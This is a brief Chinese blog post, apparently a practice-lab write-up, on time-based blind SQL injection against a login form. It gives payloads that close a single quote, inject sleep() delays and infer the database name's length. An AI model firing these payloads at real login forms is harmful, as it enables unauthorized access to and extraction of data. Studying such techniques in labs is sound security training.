标签:方式 sql base 图片 登录 测试 sleep 单引号 输入
(1)无论输入什么都没有回显,但是输入 admin‘# 时会显示成功登录,说明闭合方式是单引号
(2)无回显,则使用盲注,可用用时间延迟攻击法。
测试时间延迟是否可行:
uname=admin‘ and sleep(5) #&passwd=&submit=Submit
有明显延迟,测试成功。
(3)手工延迟注入与前面的手工注入相同,如爆库名
uname=admin‘ and if(length(database())=8,sleep(7),1)#&passwd=&submit=Submit
有明显延迟,说明库名为8位。
标签:方式 sql base 图片 登录 测试 sleep 单引号 输入
原文地址:https://www.cnblogs.com/momoli/p/10705347.html
